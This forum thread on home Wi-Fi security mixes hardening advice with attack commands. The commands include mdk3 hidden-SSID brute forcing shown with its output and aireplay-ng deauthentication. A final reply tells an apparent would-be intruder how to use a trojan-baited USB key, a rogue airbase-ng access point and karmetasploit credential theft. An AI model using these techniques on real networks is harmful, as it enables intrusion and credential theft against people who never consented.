Please keep in mind there is the practical and there is the reality! There is a big deference!  If you never had a Cop  or FBI come in your life you are a cherry,LOL  !Just kidding , but keep that in mind! Think like that! 

Disabling SSID doesn't gain you much.  When a client tries to connect it will pass the SSID in clear text to the AP.  However, that being said, at least it won't show up for any nosey non techie neighbors to see.  MAC filtering, again from a strict security perspective gains you nothing.  If you can sniff the traffic between a client and the AP, the MAC addies are passed in clear text.  Though it will prevent someone from inadvertantly connecting to it.  Make sure your PSK is 20+ non dictionary word characters and you change the SSID name from its default to something unique.  If you leave the SSID the default linksys, or wlan, or netgear or simlar commonly used SSIDs and have a dictionary word for your PSK you would be susciptable to cowpatty table attack.  and use WPA2 instead of WPA if you can.  Some recent weaknesses have been discovered in WPA, but to be honest, I don't know if the attack is practical yet or not or if there are any tools to do so.   

hi KrisTeason!
actually looking at how u have configured its pretty sure that you r normally secured, Hidden SSID not of any concern as Hidden SSID's can be bruteforced using MDK3, which is one of the best feature is to bruteforcing hideen ESSID's.it works in 2 way one we can try with every possible combination,suitable for short ESSID's or we can try using default/custom created ESSID list , using MDK3 within few seconds you can get the Hidden ESSID's
posting u a post from remote exploit where the Eg., is
Tested using Linksys WUSB54GC adapter and Linksys WRT54G Router.

Commands:

bt~#airodump-ng rausb0

open one more window

#if command supplied without target -t parameter.it will bruteforce for all #hidden ESSID's in range.

bt ~ # mdk3 rausb0 p -f SSID.txt -t 00:21:29:68:16:C2

SSID Wordlist Mode activated!

Waiting for beacon frame from target...
Sniffer thread started

SSID is hidden. SSID Length is: 11.
Trying SSID: linksys
Trying SSID: ascend
Trying SSID: <any ssid>
Trying SSID: mynetwork
Trying SSID: fatport
Trying SSID: 2WIRE975
Trying SSID: 2WIRE186
Trying SSID: 2WIRE707
Trying SSID: 2WIRE774
Trying SSID: 2WIRE436
Packets sent: 1143 - Speed: 120 packets/sec
Got response from 00:21:29:68:16:C2, SSID: "thunderbolt"


Here you got hidden ESSID in less then 10 seconds.

and yeah its good to keep ur firmware upgraded, and check there no port forwardings

regards
Ne0

Easy way to get out SSID from AP:
1. switch card in monitor(promisc) mode - iwconfig wlan0 mode monitor
or
airmon-ng stop ath0
airmon-ng start wifi0
2. run to airodump - airodump-ng -w dump -c 6 wlan0
3. wait to client connect AP  and deauthenticate STA - aireplay-ng -0 10 -a BSSID_MAC -h STA_MAC wlan0
4. Look at airodump-ng console for SSID

Yes, randomly generated 20 characters long PSK passphrase for WPA-PSK authentication and TKIP encryption with rekeying interval less than 1200 sec's  or WPA2-PSK authentication with CCMP(AES) encryption without rekeying restrinctions, is good enough.
If You woul like to be paranoidal, You could use 802.1X port based access control with Radius  server ( for example FreeRADIUS 2.0.X) and EAP-TTLS/PEAP with MSCHAPV2/MSCHAP/CHAP/MD5/PAP tunneled client authentication. It run fine...airodump-ng shows MGT  in authentication column.

Good Luck!

=================
GCIG, Security+
 

hey all ... im new to this ..

can anyone tell me how to hack wireless network .. with WPA2 encryption and cipher CCMP and Auth: MGT .... that has usernames and passwords for accounts ?

I'll save you some time:  ain't likely to happen.   That's best practices wireless config you've found right there.  :-)   If it's Cisco infrastructure, maybe you'll find some other BSSID's from the same physical access point  that are configured more loosely and attempt to join those if you can find clients and or ESSID's that are associated with those. 

Alternative approaches:  Callback trojan burned onto an autorun configured CD or U3 enabled usb key labeled "private photos" and leave it somewhere the owner of the access point or anyone the lan will pick it up and put it into their computer.

Or if you wanna still stay in the wireless realm, go after the clients. See if the client or network involved has some of those lovely braindead Windows XP machines that bleat for their remembered access points probing out to them hoping they respond.     airbase-ng  can then be used to set up a trojan access point with an ESSID matching those for which those clients are probing,   setup a dhcp server on teh same box serving addresses to the tun interface airbase-ng creates for ya,  the "sheep" client box associates, you cheerfully offer it a dhcp address, and then you can attempt to see if it's vulnerable to anything over the network.  Or, if you have internet conenctivity you can MITM them with the full karmetasploit ball of wax and capture credentials as they try to go out to the net and instead find your rogue metasploit replicas of popular websites, and they'll give up some credentials in the process, more than likely. 


Good luck!  And again, this presumes you're going after a network you have written legal permission to attack.